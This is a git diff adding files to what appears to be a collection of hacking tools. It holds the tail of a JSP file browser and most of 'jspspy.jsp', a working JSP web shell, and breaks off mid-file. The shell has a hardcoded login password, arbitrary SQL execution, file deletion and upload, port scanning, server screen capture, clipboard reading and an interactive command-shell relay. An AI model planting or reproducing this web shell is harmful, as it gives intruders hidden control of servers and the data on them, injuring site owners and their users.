+ request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if (entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + +<% + } +%> diff --git a/jsp/hackk8/JSP_66/other/jspspy.jsp b/jsp/hackk8/JSP_66/other/jspspy.jsp new file mode 100644 index 0000000..219d801 --- /dev/null +++ b/jsp/hackk8/JSP_66/other/jspspy.jsp @@ -0,0 +1,2329 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By admin +* Date 2009-12-17 +* Blog http://www.baidu.com/ +* Huan . I Love You. +*/ +private static final String PW = "max"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
